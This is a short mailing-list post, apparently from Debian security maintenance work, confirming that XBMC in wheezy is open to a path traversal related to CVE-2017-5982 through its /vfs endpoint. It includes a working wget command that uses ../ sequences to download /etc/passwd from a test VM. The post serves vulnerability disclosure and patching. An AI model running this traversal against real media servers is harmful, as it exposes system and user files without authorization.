Just confirmed (after a reasonable amount of time) that XMBC in wheezy is vulnerable to CVE-2017-5982 although the exploit is different.
When XBMC is run as root (yes, probably bad idea, this is a VM for testing): http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/auto-f4b8e6fd.tbn retrieves: /root/.xbmc/userdata/Thumbnails/Video/f/auto-f4b8e6fd.tbn Or: wget 'http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/../../../../../../etc/passwd' Downloads - guess what? /etc/passwd This was marked as "unreproducible" for 2:12.3+dfsg1-3ubuntu1 in dla-needed.txt, however I have a suspicion that is incorrect. However the information for CVE-2017-5982 is for /image not /vfs -- Brian May <[email protected]> https://linuxpenguins.xyz/brian/
